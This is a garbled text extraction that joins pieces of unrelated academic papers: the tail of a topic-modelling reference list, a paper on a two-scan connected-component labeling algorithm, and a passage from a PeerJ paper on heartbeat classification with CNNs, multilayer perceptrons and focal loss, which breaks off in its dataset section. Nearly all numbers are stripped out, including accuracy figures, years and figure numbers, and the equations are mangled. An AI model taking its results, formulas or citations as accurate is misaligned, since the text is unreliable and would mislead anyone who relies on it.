ings of the vldb endowment. https://github.com/amueller/word_cloud https://github.com/amueller/word_cloud hanna wallach, david mimno, and andrew mccallum. a. rethinking lda: why priors matter. in pro- ceedings of advances in neural information process- ing systems. hanna m. wallach, iain murray, ruslan salakhutdinov, and david mimno. b. evaluation methods for topic models. in proceedings of the th annual in- ternational conference on machine learning. limin yao, david mimno, and andrew mccallum. . efficient methods for topic model inference on streaming document collections. in knowledge dis- covery and data mining. ji soo yi, rachel melton, john stasko, and julie a. jacko. . dust & magnet: multivariate informa- tion visualization using a magnet metaphor. informa- tion visualization, ( ): – . ke zhai, jordan boyd-graber, nima asadi, and mo- hamad alkhouja. . mr. lda: a flexible large scale topic modeling package using variational infer- ence in mapreduce. in proceedings of the acm con- ference on world wide web. your paper's title starts here: please center a new connected-component labeling algorithm yuyan chao , lifeng he , kenji suzuki , qian yu , wei tang .shannxi university of science and technology, china & nagoya sangyo university, aichi, japan, chao@nagoya-su.ac.jp .aichi perfectural university, aichi, japan, helifeng@ist.aichi-pu.ac.jp .the university of chicago, chicago, usa, suzuki@uchicago.edu .nagoya institute of technology, nagoya, japan .shannxi university of science and technology, china abstract. this paper proposes a new first-scan method for two-scan labeling algorithms. in the first scan, our proposed method first scans image lines three by three with a leaving line, and for foreground pixels among each three lines, assigns them provisional labels, and finds and resolves label equivalences among them. then, it processes the leaving lines from top to bottom one by one, and for each line, assigns foreground pixels on the line provisional labels, finding and resolving label equivalences between the foreground pixels and those on the lines immediately above and below the current line. experimental results demonstrated that our method is more efficient than conventional label-equivalence- based labeling algorithms. keywords: connected component; labeling; pattern recognition . introduction labeling of connected components in a binary image is one of the most fundamental operations in pattern analysis, pattern recognition, computer (robot) vision, and machine intelligence . especially in real-time applications such as traffic-jam detection, automated surveillance, and target tracking, faster labeling algorithms are always desirable. many algorithms have been proposed for addressing this issue, because the improvement of the efficiency of labeling is critical in many applications. for ordinary computer architectures and d images, there are mainly two types of labeling algorithms: ( ) raster-scan algorithms [ - ], and ( ) label propagation algorithms [ - ]. according to experimental results on various types of images, the algorithm proposed in ref. [ ], which is an improvement on the two-scan algorithm proposed in ref. [ ], is the most efficient one, and has been used for various applications [ - ]. for convenience, we denote this algorithm as hcsi algorithm. the hcsi algorithm is a two-scan labeling algorithm. it uses equivalent label sets and a representative label table to record equivalent labels and resolve the label equivalences. for convenience, an equivalent label set with the representative label u is denoted as s(u), and the representative label of a provisional label s is t, denoted as t [s] = t. in the first scan, this algorithm uses the mask shown in fig. (a), which consists of three scanned neighbor of the current foreground pixels, to assign provisional labels to foreground pixels, and to record and resolve label equivalences. at any moment, all equivalent provisional labels are combined in a equivalent label set with the same representative label. for the case where the current foreground pixel follows a background pixel (fig. (b)), if there is no label (foreground pixel) in the mask, this means that the current foreground pixel does not connect with any scanned foreground pixel, and the current foreground pixel belongs to a new connected component. the algorithm assigns a new provisional label m to the current foreground pixel, which is initialized to , and establishes the equivalent label set s(m)={m}; it sets the representative label table as t [m] = m, and m = m+ for later processing. otherwise, i.e., if there are some foreground pixels in the mask, all of such foreground pixels and the current foreground pixel belong to the same connected component. therefore the current foreground pixel can be assigned any of the labels in the mask. on the other hand, for the case where the current foreground pixel follows another foreground pixel (fig. (c)), the current foreground pixel can be assigned the same label of that foreground pixel. in any cases, if there are provisional labels belonging to different equivalent label sets in the mask, all provisional labels in those sets are equivalent labels, and they will be combined together. as soon as the first scan is finished, all equivalent labels of each connected component have been combined into an equivalent label set with a unique representative label. in the second scan, by replacement of each provisional label with its representative label, all foreground pixels of each connected component will be assigned a unique label. . outline of our proposed first-scan method for an n × m binary image, we use b(x, y) to denote the pixel value at (x, y) in the image, where ≤ x ≤ n, ≤ y ≤ m, and v(x, y) for the value of b(x, y). for convenience, we suppose that the value of foreground pixels is and that of background pixels is . moreover, all pixels in the edge of an image are considered to be background pixels. because we don’t make any processing for background pixels, we will not discuss the processing for background pixels. our first-scan method consists of two parts: scan -a and scan -b. in scan -a, from line , it scans image lines every four other lines, i.e., in the order of line , line , line , … (the black lines in fig. ). for each current line being processed, it assigns to the foreground pixels in the line and its neighbor lines (the gray lines in fig. ) provisional labels and resolves the label equivalences among them. by scan -a, all foreground pixels in each area consisting of black and gray lines in fig. will be assigned provisional labels, and the label equivalences among them will be resolved. fig. mask for the eight-connected connectivity. fig. first scan in our proposed method. then, scan -b scans the lines unprocessed in the scan -a (the white lines in fig. ) in the order of line , line , line , …. for each current line, it assigns to the foreground pixels in the line provisional labels and resolves the label equivalences among them and those in their neighboring lines. when scan -b is finished, all foreground pixels in the given image will be assigned provisional labels, and the label equivalences among them will be resolved, i.e., all equivalent labels will be combined into an equivalent label set with a unique representative label, similar to the result of the first scan in the hcsi algorithm. in the second scan, similar to other two-scan labeling algorithms, by replacing the provisional label of each foreground pixel with its representative label, we can complete the whole labeling process. in scan -a, our method uses the mask shown in fig. to assign to the current pixel b(x, y), its neighbor above, b(x, y− )and its neighbor below, b(x, y+ )provisional labels, and to resolve the label equivalences in the mask. the following four cases can be considered. case : the current pixel b(x, y) is a background pixel that follows another background pixel (fig. (b), (c), (e), (f)). when the neighbor above b(x, y- ) (the neighbor below b(x, y+ )) of the current pixel is a foreground pixel, we can process it as follows: if its neighbor left is a foreground pixel, assigning that pixel’s label to it, otherwise, assigning a new provisional label to it. fig. masks used in our proposed method for fig. cases where the current pixel is a background pixel. scan -a. in scan -a. case :the current pixel is a background pixel following a foreground pixel, i.e., b(x- , y) is a foreground pixel (fig. (a), (d)).when the neighbor above b(x, y- ) (the neighbor below, b(x, y+ )) of the current pixel is a foreground pixel, we can just assign b(x- , y)’s label to it. case :the current pixel is a foreground pixel following a background pixel (fig. (b)-(e)). the current foreground pixel and its neighbor above b(x, y- ) and neighbor below b(x, y+ ) can be processed as follows: ( ) if both of b(x- , y- ) and b(x- , y+ ) are foreground pixels, we resolve the label equivalence between the two corresponding labels, and assign their representative label to the current pixel; ( ) if either b(x- , y- ) or b(x- , y+ ) is a foreground pixel, then assigning its label to the current label;( ) if none of b(x- , y- ) and b(x- , y+ ) is a foreground pixel, then assigning a new label to the current pixel. moreover, we assign the current pixel’s label to its neighbor above (its neighbor below) if that pixel is a foreground pixel. fig. cases where the current pixel is a foreground fig. mask used for scan -b. pixel in scan -a. case : the current pixel is a foreground pixel following a foreground pixel, i.e., b(x- , y) is a foreground pixel (fig. (a)). we just assign b(x- , y)’s label to the current pixel. moreover, we assign the same label to its neighbor above (its neighbor below) if that pixel is a foreground pixel. after scan -a, from line , in the order of line , line , line , , scan -b scans the lines unprocessed in scan -a. it does nothing for background pixels. for each foreground pixel, it uses the mask shown in fig. to assign to the pixel a provisional label and resolves the label equivalences in the mask. because the foreground pixels that are connected each other in the mask, such a combination is called a connected part, belonging to the same connected component, and their provisional labels are equivalent labels and belong to the same equivalent label set; thus, a connected part can be considered as if a single foreground pixel. for this reason, checking the pixels in the mask in the order of the largest number of the neighbors of a pixel first will reduce the number of times for checking pixels in the mask; thus, it leads to efficient processing [ ]. fig. cases where the current pixel is a foreground pixel following another foreground pixel in scan -b. if the current pixel is a foreground pixel following another foreground pixel, there are nine subcases shown in fig. . in scan -b, we process the current pixel b(x, y) as follows: ( ) because b(x- , y) is a foreground pixel, we assign b(x- , y)’s label to the current foreground pixel; ( ) because the number of connected parts does not depend on whether b(x- , y- ) and/or b(x- , y+ ) is a background pixel or a foreground pixel, we do not need to check either of them; ( ) according to the number of neighbors of each pixel in the mask, the order for checking the pixels except for b(x- , y- ), b(x- , y+ ), and b(x- , y) is b(x, y- ) b(x, y+ )  b(x+ , y- )  b(x+ , y+ ). if b(x, y- ) is a foreground pixel (e.g., fig. (a)), b(x, y- ) and b(x- , y) belong to the same connected part, we need to do nothing for the pixel. moreover, in this subcase, whether b(x+ , y- ) is a foreground pixel or not does not change the number of connected parts in the mask, we also need to do nothing about this pixel. on the other hand, if b(x, y- ) is a background pixel and b(x+ , y- ) is a foreground pixel (e.g., fig. (b)), we need to resolve the label equivalence of v(x- , y) and v(x+ , y- ). then, b(x, y+ ) and b(x+ , y+ ) can be processed in a similar way. on the other hand, in the case where the current foreground pixel b(x, y) follows a background pixel, there are subcases, as shown in figure . except for b(x- , y), according to the number of neighbors of each pixel in the mask, the order for checking pixels is b(x, y- ) b(x, y+ )  b(x- , y- )  b(x- , y+ )  b(x+ , y- )  b(x+ , y+ ). for each pixel, if there are more than one connected part in the mask (e.g., figure (a)-(d)), we need to resolve the label equivalences among them, and assign to the current foreground pixel its representative label. on the other hand, if there is only one connected part in the mask (e.g., figure (e)), we only need to assign to the current foreground pixel its representative label. lastly, if there is no foreground pixel in the mask (figure (u)), we only need to assign to the current pixel a new provisional label. fig. cases where the current pixel is a foreground pixel following a background pixel in scan -b. as soon as the first scan is finished, all provisional labels assigned to each connected component have been combined in an equivalent label set with a unique representative label. during the second scan, similar to all conventional two-scan labeling algorithms, by replacing each provisional label with its representative label, we can complete labeling. . comparative evaluation we implemented the hcsi algorithm and our algorithm with the c language on a pc-based workstation (intel pentium d . ghz + . ghz cpus, gb memory, mandriva linux os). because our method is a new first-scan method (as we described above, the second scan of our method is exactly the same with the hcsi method), we will compare the performances of the two methods only on the first scan. all data in this section were obtained by averaging of the execution time for , runs with a single core. images used for testing included of four types: noise images, natural images, texture images, and medical images. noise images consist of forty one x -sized noise images were generated by thresholding of the images containing uniform random noise with different threshold values from to in steps of . on the other hand, natural images, including landscape, aerial, fingerprint, portrait, still-life, snapshot, and text images, obtained from the standard image database(sidba)developed by the university of tokyo (http://sampl.ece.ohio-state.edu/data/stills/sidba/index.htm) and the image database of the university of southern california (http://sipi.usc.edu/database/), were used for realistic testing of labeling algorithms. in addition, seven texture images, which were downloaded from the columbia-utrecht reectance and texture database (http:// www .cs. columbia.edu/cave/software/curet/index.php), and medical images obtained from a medical image database of the university of chicago were used for testing. all of these images were × pixels in size, and they were transformed into binary images by a standard thresholding method. fig. shows the speed-up of our method compared to the hcsi method on the × noise images, where the vertical axis is defined as (t -t )/t , where t is the execution time of the hcsi algorithm and t is that of the proposed method. the experimental results on the natural images, the medical images, and the textural images are shown in tab. . tab. comparation on various types of images [ms]. image type hcsi ours natural max. . . mean. . . min. . . medical max. . . mean . . min. . . textural max. . . mean . . min. . . . discussion because our algorithm processes an image piecewise, it is not as efficient as the mectsl algorithm, which does that successively. therefore, our algorithm is not as efficient as the mectsl algorithm for the noise images whose densities are lower than %, where the advantage of our algorithm for resolving connectivity cannot be exerted. for high-density noise images, because our method processes an image every four lines in scan -a, the number of provisional labels assigned by our algorithm is much larger than that assigned by the hcsi algorithm. for example, for the highest density noise image, the number of provisional labels assigned by our algorithm and that assigned by the hcsi algorithm are and , respectively. for each provisional label, we need to apply some operations to establish a new equivalent label set and initialize the representative label table. moreover, because the connectivity of the foreground pixels in this case is simple, the advantage of our method for resolving connectivity cannot be exerted, and the effect of the efficiency of our algorithm becomes weaker and weaker with the increase of the density of an image from %. fig. speed up on the densities of noise images. . conclusions in this paper, we presented a new method for the first scan of label-equivalence based two-scan labeling algorithms. in our proposed method, the first scan consists of two subscans: scan -a and scan -b. in scan -a, we process image lines every four lines. for each current line being scanned, we assign to the foreground pixels in the line and its neighboring lines provisional labels and resolve the label equivalences among them. in scan -b, we scan the lines that were unprocessed in scan -a one by one. for each current line, we assign to the foreground pixels in the line provisional labels and resolve the label equivalences among them and those in its neighboring lines processed in scan -a. by our method, the number of times for checking pixels for assigning provisional labels and processing label equivalences is decreased; thus, the efficiency of labeling is improved. our experimental results demonstrated that our method was more efficient than the first scan of conventional label-equivalence-based two-scan labeling algorithms. . acknowledgment this research was partially supported by the ministry of education, science, sports and culture, japan, grant-in- aid for scientific research (c), , . references [ ] c. ronsen and p. a. denjiver. connected components in binary images: the detection problem, research studies press, . [ ] r. c. gonzalez and r. e. woods. digital image processing. addison wesley, . [ ] k. suzuki, i. horiba, and n. sugie. linear-time connected-component labeling based on sequential local operations. computer vision and image understanding, : - , . [ ] a. rosenfeld and j. l. pfalts. sequential operations in digital picture processing. journal of acm, ( ): - , october . [ ] l. he, y. chao, and k. suzuki. a run-based two-scan labeling algorithm. ieee transactions on image processing, ( ): - , [ ] l. he, y. chao, and k. suzuki, k. wu. fast connected-component labeling. pattern recognition, ( ): [ ] l. he, y. chao, and k. suzuki. an efficient first-scan method for label-equivalence-based labeling algorithms. pattern recognition letters, : - , . [ ] l. he, y. chao, and k. suzuki. a run-based one-and-a-half-scan connected-component labeling algorithm. international journal of pattern recognition and artificial intelligence, vol. , no. ( ), pp. - . [ ] l. he, y. chao, and k. suzuki. two efficient label-equivalence-based connected-component labeling algorithms for three-dimensional binary images. ieee transactions on image processing, ( ), , doi:. . /tip. . . [ ] f. chang, c. j. chen, and c. j. lu. a linear-time component-labeling algorithm using contour tracing technique. computer vision and image understanding, : - , . [ ] q. hu, g. qian and w. l. nowinski, fast connected-component labeling in three-dimensional binary images based on iterative recursion. computer vision and image understanding, : - , [ ] a. alexey, k. tomas, w. florentin, and d. babette. real-time image segmentation on a gpu. facing the multicore-challenge, lecture notes in computer science, : - , , springer berlin / heidelberg. [ ] christopher wolfe, t. c. nicholas graham, and joseph a. pape. seeing through the fog: an algorithm for fast and accurate touch detection in optical tabletop surfaces. in acm international conference on interactive tabletops and surfaces (its ' ). acm, - , , new york, ny, usa. a hybrid method for heartbeat classification via convolutional neural networks, multilayer perceptrons and focal loss a hybrid method for heartbeat classification via convolutional neural networks, multilayer perceptrons and focal loss tao wang , changhua lu , mei yang , feng hong and chun liu school of computer and information, hefei university of technology, hefei, anhui, china beijing huaru technology co., ltd. hefei branch, hefei, anhui, china school of electrical engineering and automation, hefei university of technology, hefei, anhui, china abstract background: heart arrhythmia, as one of the most important cardiovascular diseases (cvds), has gained wide attention in the past two decades. the article proposes a hybrid method for heartbeat classification via convolutional neural networks, multilayer perceptrons and focal loss. methods: in the method, a convolution neural network is used to extract the morphological features. the reason behind this is that the morphological characteristics of patients have inter-patient variations, which makes it difficult to accurately describe using traditional hand-craft ways. then the extracted morphological features are combined with the rr intervals features and input into the multilayer perceptron for heartbeat classification. the rr intervals features contain the dynamic information of the heartbeat. furthermore, considering that the heartbeat classes are imbalanced and would lead to the poor performance of minority classes, a focal loss is introduced to resolve the problem in the article. results: tested using the mit-bih arrhythmia database, our method achieves an overall positive predictive value of . %, sensitivity of . %, f -score of . %, and accuracy of . %. compared with existing works, our method significantly improves the performance of heartbeat classification. conclusions: our method is simple yet effective, which is potentially used for personal automatic heartbeat classification in remote medical monitoring. the source code is provided on https://github.com/jackandcole/deep-neural- network-for-heartbeat-classification. subjects artificial intelligence, data mining and machine learning, emerging technologies keywords arrhythmia, heartbeat classification, focal loss, convolutional neural network, class imbalance introduction heart arrhythmia, one of the most important cardiovascular disease (cvd), refers to the irregular beating of the patient’s heart. most arrhythmias are asymptomatic and not severe, but some could cause heart disease symptoms such as passing out, lightheadedness, chest pain, shortness of breath, and even stroke and cardiac arrest such as ventricular fibrillation, ventricular escape and atrial fibrillation, which are extremely dangerous and how to cite this article wang t, lu c, yang m, hong f, liu c. . a hybrid method for heartbeat classification via convolutional neural networks, multilayer perceptrons and focal loss. peerj comput. sci. :e doi . /peerj-cs. submitted september accepted november published november corresponding authors tao wang, wtustc@mail.ustc.edu.cn chun liu, dqlch @hfut.edu.cn academic editor robertas damaševičius additional information and declarations can be found on page doi . /peerj-cs. copyright wang et al. distributed under creative commons cc-by . https://github.com/jackandcole/deep-neural-network-for-heartbeat-classification https://github.com/jackandcole/deep-neural-network-for-heartbeat-classification http://dx.doi.org/ . /peerj-cs. mailto:wtustc@�mail.�ustc.�edu.�cn mailto:dqlch @�hfut.�edu.�cn https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ need immediate treatment. according to statistics from the world health organization, the number of cvd deaths in is close to . million, accounting for about % of the total deaths (shen et al., ). electrocardiogram (ecg), a device that records the electrical activity of the heart, is widely used to diagnose cardiac arrhythmias in clinical (mondéjar-guerra et al., ). an ecg signal consists of a series of periodically repeating heartbeats. each heartbeat usually contains a qrs complex, a t wave, and a p wave, in a few cases there is a u wave (vulaj et al., ). the most significant characteristic of an ecg signal is the qrs complex. by analyzing this complex, arrhythmia can be detected. however, the occurrence of arrhythmia is intermittent, especially in the early stages, which makes it difficult to perform effective detection in a short time (mondéjar-guerra et al., ). to solve this problem, a holter monitor is often used to collect long-term heart electrical activity recordings (sannino & de pietro, ). in general, an ecg recording lasts several minutes or even hours. investigating a variety of abnormal arrhythmias beat-by-beat from long-term ecg recordings is very exhausting, even for trained cardiologists. therefore, there is an urgent need for a computer-aided method to automatically detect abnormal heartbeats from long-term ecg data. over the past two decades, a lot of research works (de albuquerque et al., ; de chazal, o’dwyer & reilly, ; mondéjar-guerra et al., ) have been spent on classifying heartbeats automatically. most of these methods are based on morphological characteristics of heartbeats and traditional signal processing techniques. however, the ecg waveform and its morphological characteristics (e.g., the shape of the qrs waves and p wave) of different patients are significantly different, and for the same patient, there are also differences in different circumstances (mondéjar-guerra et al., ), so the fixed features used in these methods are not sufficient to accurately distinguish arrhythmias for all patients. in recent years, some deep neural networks have been proposed, such as convolutional neural networks (cnn), which can automatically extract morphological features and adapt to variations between patients. nevertheless, there is another challenge when processing medical data. due to the limited number of rare classes, the number of one class may greatly exceed that of other classes, that is, the distribution of classes is imbalanced. however, most algorithms try to minimize the overall classification loss during the training process, which implies that these classes are equally important and the same misclassification cost is allocated to all types of errors. as a result, the classifier will tend to correctly classify and favor more frequent classes. the article presents a hybrid method for heartbeat classification via cnn, multilayer perceptrons (mlp) and focal loss. an overall structure of the method is displayed in fig. . the morphological features are extracted by one-dimensional ( d) cnn and combined with the rr intervals features as the input of mlp. the rr intervals features contain the dynamic information of the heartbeat, which could help better capture the pattern of the ecg waveform. furthermore, considering that the heartbeat classes are wang et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ imbalanced and would lead to the poor performance of minority classes, a focal loss is introduced to solve the problem. it shows superior performance in various application environments (howland et al., ; lin et al., ; zhou, waterman-storer & cohan, ). by testing in the well-known mit-bih arrhythmia database (moody & mark, ), our method achieves superior classification performance than existing heartbeat classification methods. note that the accuracy of the ecg classification method has been standardized according to the association for the advancement of medical instrumentation’s (aami) recommendations. the proposed method obtains an overall ppv of . %, se of . %, f of . %, and accuracy of . %. the article is organized as follows: “related works” presents the related works of heartbeat classification. the proposed method and loss function are introduced in “methods” and “loss function”. the dataset and the performance of our method against existing works are described in “results”. “discussion” discusses the conclusions. figure a scheme of our proposed method. (a) overview of our method. (b) cnn block of our cnn architecture. (c) an example of mor- phological features extracted by cnn, where the upper part heartbeat signal is the input of cnn, and the lower part is the features extracted by cnn, that is, the morphological features. these features will be flattened and combined with the rr interval features when used as the input of the mlp classifier. full-size doi: . /peerj-cs. /fig- wang et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ related works the existing automatic heartbeat classification works can be divided into two paradigms: intra-patient paradigm and inter-patient paradigm (de chazal, o’dwyer & reilly, ; sannino & de pietro, ). in the intra-patient paradigm, the dataset is based on the heartbeat label split into training and test subsets, so an ecg recording will appear in two subsets (sannino & de pietro, ). according to de chazal, o’dwyer & reilly ( ), the results of this paradigm are biased, resulting in an accuracy of about % in the test phase, because the patient’s characteristics are learned during the training phase (sellami & hwang, ). however, in actual scenarios, the trained model must be able to handle inter-patient variations during the training phase. in the inter-patient paradigm, the training set and test set are from different patients (sannino & de pietro, ), so the differences between patients will be considered during the training process. the classifier will show a better generalization capability. for instance, de chazal, o’dwyer & reilly ( ) propose a linear discriminant heartbeat classification method based on heartbeat morphological and dynamic features. their method achieves a ppv of . %, se of . % in the sveb class, and a ppv of . %, se of . % in the veb class. ye, kumar & coimbra ( ) apply wavelet transform and independent component analysis (ica) to extract morphological features from heartbeats, and combined with dynamic rr interval features develop an support vector machine (svm) method to classify heartbeat. a ppv of . %, se of . % in the sveb class, and a ppv of . %, se of . % in the veb class are obtained by their method. however, the classification accuracies of these methods are significantly lower than the intra-patient paradigm-based methods. this is due to variations of ecg characteristics between patients. recently, with the rapid development in deep learning, deep neural networks-based, especially cnn-based, heartbeat classification methods have received a lot of attention. for example, yıldırım et al. ( ) develop a d-cnn for arrhythmia detection based on long-term ecg signal. their method achieves . % overall accuracy in cardiac arrhythmias. similarly, sellami & hwang ( ) develop a cnn with a batch-weighted loss function for heartbeat classification. hannun et al. ( ) present a deep neural network with residual block to classify rhythm classes. romdhane et al. ( ) based on cnn and focal loss propose an ecg heartbeat classification method. although the performance of heartbeat classification is improved, these works mainly focus on using cnn to extract the heartbeat morphological features, while ignoring the influence of rr intervals on heartbeat classification. research shows that by integrating rr interval features, the performance of heartbeat classification can be significantly improved (de chazal, o’dwyer & reilly, ; mondéjar-guerra et al., ; sannino & de pietro, ). romdhane et al. ( ) try to use an improved heartbeat segmentation method to make cnn capture rr interval information, but in their work, cnn can only extract the previous rr interval information at most. this is due to the incomplete division of the right interval. different from existing works, we pre-extract the rr interval wang et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ information in advance, and then combine it with cnn-based morphological features as the input of the classifier. in addition to the above two classification paradigms, a hybrid paradigm has also been studied by some scholars, namely patient-specific paradigm. in the patient-specific paradigm, a global model is first built and then use part of patient data to tune the model to form a local model. de chazal, o’dwyer & reilly ( ) shows that this paradigm is superior to a pure inter-patient model. however, this paradigm requires a professional doctor to label part of the ecg data, and an engineer to fine-tuning the model in clinical. meanwhile, the patient’s ecg signal may change significantly over time, that is, the current ecg signal may undergo large variations at some time in the future, and the use of a previously fine-tuned local classifier may lead to larger misclassification. we focus on the performance of our method in the inter-patient paradigm in the article. methods figure shows the overall structure of the proposed method. the proposed method includes three steps: ecg denoising, feature extraction, and classification. the feature extraction step contains rr intervals features extraction and morphological features extraction via cnn architecture. ecg denoising the ecg signal is usually disturbed by various noises such as electromyography noise, power line interference and baseline wandering (chen et al., ), which makes useful features to be difficultly extracted. in this step, most previous works typically perform a baseline wandering removal and then high-frequency noise filtering (mondéjar- guerra et al., ). however, excessive filtering will lead to the loss of some helpful information in the ecg signal. since cnn has better noise immunity (huang et al., ), we only perform baseline wandering removal and preserve as much information as possible from the raw ecg signal. two median filters are combined to remove the baseline wandering of the ecg signal in the article. first, the qrs complexes and p-waves are removed using a -ms width median filter, and then a -ms width median filter is further adopted to remove t-waves. the output is the baseline wandering of the ecg signal, and the baseline-corrected ecg signal can be achieved by subtracting it from the original signal. an effect of baseline wandering removal is shown in fig. . after obtaining the baseline-corrected ecg signal, the ecg is further segmented into a series of heartbeats based on the labeled r-peaks. in specific, for each heartbeat, we obtain sampling points of the ecg signal segment, sampling points before and sampling points after the labeled r peak. the r-peak detection is not the focus of the article and we directly use labeled r-peaks in the dataset, as there are many high-precision (> %) r-peak detection methods in the literature (gacek & pedrycz, ; pan & tompkins, ). wang et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ rr interval features extraction the time interval between two consecutive r-peaks is normally called the rr interval (ruangsuwana, velikic & bocko, ), which contains the dynamic information of the heartbeat. to capture this information for heartbeat classification, four features are extracted from the rr interval, namely previous rr interval, post rr interval, ratio rr and local rr interval. the previous rr interval refers to the distance between the current r-peak position and the previous r-peak, the post rr interval is the distance between the current r-peak position and the following one. the ratio rr represents the ratio of the previous rr interval and the post rr interval. these three features reflect the instantaneous rhythm of a heartbeat. the average value of the rr intervals before the current heartbeat is taken as the local rr interval, which represents the overall rhythm in the past. due to the inter-patient variations in the ecg signal, the rr interval of different patients cannot be directly compared, in this article we use the entire patient’s ecg signal to calculate the average rr interval, and subtract it from all rr characteristics (expect the ratio rr) to eliminate this effect. morphological features extraction via cnn architecture convolutional neural networks is a powerful deep neural network inspired by visual neuroscience (chu, shen & huang, b). it has been successfully used in speech recognition, natural language processing, image classification, and biomedical signal (palaz & collobert, ; pourbabaee, roshtkhari & khorasani, ; yin et al., ). given an image, cnn can effectively learn high-level abstractions, which can then be input into the classifier (e.g., fully connected neural network and svm) for classification (zhang, zhou & zeng, ). a cnn usually consists of convolutional layers, activation functions, and pooling layers, and sometimes including batch normalization layers. figure example of baseline wandering removal. (a) raw ecg signal. (b) raw heartbeat. (c) base- line-corrected ecg signal. (d) baseline-corrected heartbeat. it is easy to notice that after removing the baseline wandering, the heartbeat is shifted to zero. full-size doi: . /peerj-cs. /fig- wang et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ convolutional layer: it is the most important component in cnn and performs convolution operation on the input data (liu & chen, ). let fk and s be the filter and the d ecg signal, respectively. the output of the convolution is calculated as follows: c i½ � ¼ s ið Þ � fk ið Þ ¼ x m s mð Þfk i � mð Þ where m is the size of the filter and the filter fk is realized by sharing the weights of adjacent neurons. activation function: the activation function is used to determine whether the neuron should be activated. the purpose is to enable neurons to achieve nonlinear classification. rectifier linear unit (relu) is one of the most widely used activation function, which can be expressed as f xð Þ ¼ max ; xð Þ where x is the output value of the neuron. pooling layer: the pooling layer, also known as the down-sampling layer, is an operation that decreases the computational intensity by reducing the output neuron dimension of the convolutional layer, and can handle some variations due to signal shift and distortion (zhang, zhou & zeng, ). the most widely used pooling method is the max-pooling, which is to apply the maximum function over input s. let m be the filter size, and the output is: m xð Þ ¼ max s x þ kð Þ kj jj � m � � � batch normalization layer: the batch normalization layer is a technology for standardizing network input, applied to either the activations of a prior layer or inputs directly, which can accelerate the training process, and provides some regularization, reducing generalization error. let b ¼ xi; i ¼ ; � � � ; mf g be a mini-batch of the entire training set, the output of batch normalization is as follows: bxi ¼ xi � mbffiffiffiffiffiffiffiffiffiffiffiffiffiffi s b þ e p where sb and μb are the variance and the mean of training set b, respectively. e is an arbitrarily small constant to ensure the denominator is not zero. a cnn is developed and utilized for heartbeat morphological feature extraction in this article. the cnn architecture is displayed in fig. . it contains three convolutional blocks and three pooling layers. each convolutional block includes a convolution layer, a relu activation function and a batch normalization layer. the kernel of the convolution is reduced as the network structure becomes deeper. for instance, the first convolution kernel is , while the second is reduced to . a batch normalization and relu activation are applied after each convolution operation, and a max-pooling is used to reduce the spatial dimension. note that the parameters of the convolutional network are usually set based on the author’s experience. the detailed parameters of cnn architecture are listed in table . the output of the last pooling layer is the morphological features wang et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ extracted by cnn from the heartbeat. an illustration of the morphological features extracted from the heartbeat is shown in fig. c. mlp classifier the cnn-based morphological features and rr interval features are combined as the input of the classifier in the article. in general, any classifier (i.e., svm and random forest (rf)) can be used for heartbeat classification. here, we adopt a multilayer perceptron (mlp, also known as fully connected neural networks in deep learning) as the classifier. the reason behind this is that cnn and mlp can be combined for parameter training (we call it one-step training). compared with other methods, this usually achieves better performance. specifically, our mlp classifier contains an input layer, a hidden layer and an output layer. the input layer consists of two parts of information: cnn-based morphological features and rr interval features. the hidden layer has neurons, and each neuron is connected to the input features. the output layer neurons are in the article, each representing a kind of arrhythmia or normal heartbeat. the details of our method are shown in fig. and table . loss function before training a deep neural network, a loss function is first needed. the cross-entropy loss is the most widely used in deep neural network classification (chu, wang & lu, a). table the detailed parameters of our proposed deep neural network. layers layer name kernel size no. of filters stride output shape no. of trainable parameters no. of non-trainable parameters input a – – – × – – d convolution × – batch normalization – – – × relu – – – × – – max-pooling – × – – d convolution × , – batch normalization – – – × relu – – – × – – max-pooling – × – – d convolution × , – batch normalization – – – × relu – – – × – – max-pooling – × – – flatten – – – – – input b – – – – – concatenate – – – – – dense – – – , – dense – – – – notes: a refers to the raw signal of the heartbeat. the morphological features of the heartbeat will be obtained through the cnn architecture. b is the rr interval features of the heartbeat. it will be combined with the cnn-based morphological features to build the final classification model. wang et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ however, this loss function does not address the class imbalance problem. a focal loss function is introduced in the article to deal with this problem. cross-entropy loss the cross-entropy is a measure in information theory (robinson, cattaneo & el-said, ). it is based on entropy and calculates the difference between two probability distributions. closely related to kl divergence that computers the relative entropy between two probability distributions, but the cross-entropy calculates the total entropy between the distributions. the cross-entropy is usually taken as the loss function in deep neural network classification (chu, wang & lu, a). let ti and pi be the ground truth and the estimated probability of each category, the cross-entropy loss is computed by: ce ¼ � xc i ti � log pið Þ where c refers to the category set of the heartbeat. in the cross-entropy loss, each category is treated equally, which causes the majority category to overwhelm the loss and the model tends to classify to the majority category in an imbalanced environment. focal loss a characteristic of cross-entropy loss is that even easy-to-classify examples can cause significant losses, which will cause the loss of easy examples that constitute most of the dataset during the training process to negatively affect rare classes (lin et al., ). the focal loss is designed to deal with this imbalanced problem by reshaping the cross- entropy loss function by reducing the attention to easy examples and focusing on difficult ones. a general formula for focal loss is expressed as: fl ¼ � xc i ti � � pið Þglog pið Þ where g acts as the modulating factor. as shown in fig. , the higher the c value, the lesser the cost incurred by well-classified examples. in practice, the α-balanced variant of the focal loss is usually used when one or more categories are highly imbalanced, which is defined as: fl ¼ � xc i ti � ai � pið Þglog pið Þ where ai is the weighting factor of each category. results data set the ecg dataset from the mit-bih arrhythmia database (moody & mark, ) is used to test our proposed method. this dataset contains -min ambulatory two leads ecg signal records collected from subjects. each ecg signal is sampled at hz with wang et al. ( ), peerj comput. sci., doi . /peerj-cs. / 